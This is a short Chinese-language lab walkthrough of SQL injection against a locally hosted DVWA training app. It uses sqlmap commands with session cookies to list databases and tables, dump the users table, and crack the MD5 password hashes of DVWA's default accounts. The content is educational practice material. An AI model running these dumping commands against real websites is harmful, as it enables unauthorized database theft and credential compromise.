环境
window10、sqlmap、本地搭建的DVWA
步骤
1、先将DVWA安全等级设置为low
2、选择SQL Injection输入1查询
3、将url复制下来,并查看cookie信息
url:http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
cookie="Cookie: security=low; PHPSESSID=7si7t5md1ntl03q0oc1ktcm0q2"
4、打开sqlmap使用命令爆库
命令
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" --dbs
然后在注入过程中会有一些交互,根据情况选择y/n,然后得到数据库:
5、爆表
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa --table
得到dvwa中的数据表如下:
6、爆users表结构并查询users表内有多少条数据
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --column
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --count
7、爆users表内容
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --dump
8、爆指定字段(user,password)
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users -C user,password --dump
可以看到password是以密文存储的,在爆破过程中会询问是否要用字典进行解密,我选择的是n,下面我是手动解密的(数据少的时候可以考虑),最后得到如下结果:在线解密
user | Password | Password(解密后) |
---|---|---|
admin | 5f4dcc3b5aa765d61d8327deb882cf99 | password |
gordonb | e99a18c428cb38d5f260853678922e03 | abc123 |
1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | charley |
pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | letmein |
smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | password |